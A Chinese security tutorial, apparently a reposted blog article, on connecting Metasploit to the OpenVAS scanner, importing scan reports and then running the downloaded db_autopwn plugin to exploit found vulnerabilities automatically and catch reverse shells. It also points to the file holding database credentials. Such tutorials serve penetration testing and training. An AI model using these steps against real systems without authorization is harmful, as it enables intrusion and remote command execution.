前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >工具| Metasploit与OpenVAS的结合使用

工具| Metasploit与OpenVAS的结合使用

作者头像
漏斗社区
发布2018-05-15 14:46:35
2.6K0
发布2018-05-15 14:46:35
举报
文章被收录于专栏:漏斗社区

之前斗哥介绍过openVAS,今天我们来一起学习下如何使用metasploit连接openVAS进行漏洞扫描,并且结合db_autopwn插件进行一次自动化攻击。

OpenVAS简介

OpenVAS的结构如下图所示,OpenVAS Manager通过OTP(OpenVAS Transfer Protocol)控制扫描器,并且它本身提供了基于XML的无状态OMP(OpenVAS Management Protocol)。OpenVAS Scanner 是执行扫描的主服务,默认端口为9391;OpenVAS Manager主要负责与客户端Greebone程序通信,完成扫描任务、检测报告的提交等工作,默认端口是9390。因此在我们使用metasploit调用openVAS的时候也是连接9390这个端口,通过命令交互驱动manager进行操作。

metasploit连接OpenVAS

1.加载openVAS模块

进入msfconsole控制台,输入以下命令:

msf >load openvas

2.连接OpenVAS

msf > openvas_connect hostname password host port <ssl-confirm>

当连接到外部的openVAS时,最后一个参数必须为“ok”,代表你信任该连接。

msfconsole调用openVAS扫描漏洞

在msf中openVAS操作都基于ID进行。

1.创建扫描目标

msf > openvas_target_create <name> <hosts> <comment>

2.创建扫描任务

创建扫描任务,需要关联扫描目标和选择扫描策略,默认有8种扫描策略,输入以下命令可以查看扫描策略:

msf > openvas_config_list

选择一个扫描策略然后通过以下命令进行扫描任务的创建:

msf > openvas_task_create <name> <comment> <config_id> <target_id>

3.启动扫描并且查看进度

使用以下命令启动扫描任务: msf > openvas_task_start <id>

可以使用以下命令查看扫描进度: msf > openvas_task_list

status是扫描状态,当为done的时候表示扫描完毕,progress表示扫描的进度,status状态为new和done的时候progress均为-1。

4.查看报告

使用以下命令可以查看报告列表: msf > openvas_report_list

5.下载报告

下载报告的时候需要知道openVAS支持哪些文件格式的下载,通过以下命令查看可以下载的文件格式: msf > openvas_format_list

使用以下可以选择对应的文件格式进行报告的下载: msf > openvas_report_download <report_id> <format_id> <path> <report_name>

6.导入报告

将报告导入metasploit的数据库中,首先要保证数据库是启动的,通过以下命令查看当前数据库的连接情况: msf > db_status

如果没有数据库链接,需要进行数据库连接,以下介绍的是连接metasploit本地的postgresql数据库:

root@kali:~# service postgresql start

msf > db_connet username:password@localhost:port/database

不知道postgresql的用户密码可以查看以下这个存放用户名密码的文件:

/usr/share/metasploit-framework/config/database.yml

在确保有数据库链接的情况下,进行报告导入,使用以下命令: msf > openvas_report_import <report_id> <format_id> 只允许XML或者NBE格式的报告导入。

导入报告后,可以通过以下命令进行漏洞查看: msf > vulns

db_autopwn自动化攻击插件

metasploit4.5版本前有个自动化攻击的模块——db_autopwn,之后的版本弃用了这个模块,但网上有资源可以下载这个模块。

1.首先先随便load一个不存在插件,从报错信息可以知道插件存在的位置:

/usr/share/metasploit-framework/plugins/

2.进入插件存放目录,下载db_autopwn.rb:

root@kali:/usr/share/metasploit-framework/plugins# wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb

3.加载db_autopwn模块: msf > load db_autopwn

4.通过以下命令查看ab_autopwn的用法:

msf > db_autopwn -h

5.使用以下命令进行自动化攻击:

msf > db_autopwn -t -p -e -r

6.出现以下情况就是有shell反弹回来,并且建立连接:

7.跑完所有脚本后,如果有反弹shell,就会显示以下会话详情:

8.通过命令连接到该会话,可以执行任意命令:

Metasploit与openVAS结合使用就介绍到这啦,调用扫描的命令都很简单,自动化攻击也省下不少时间,大家可以动手试试哇~

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2018-04-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 漏斗社区 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
脆弱性检测服务
脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档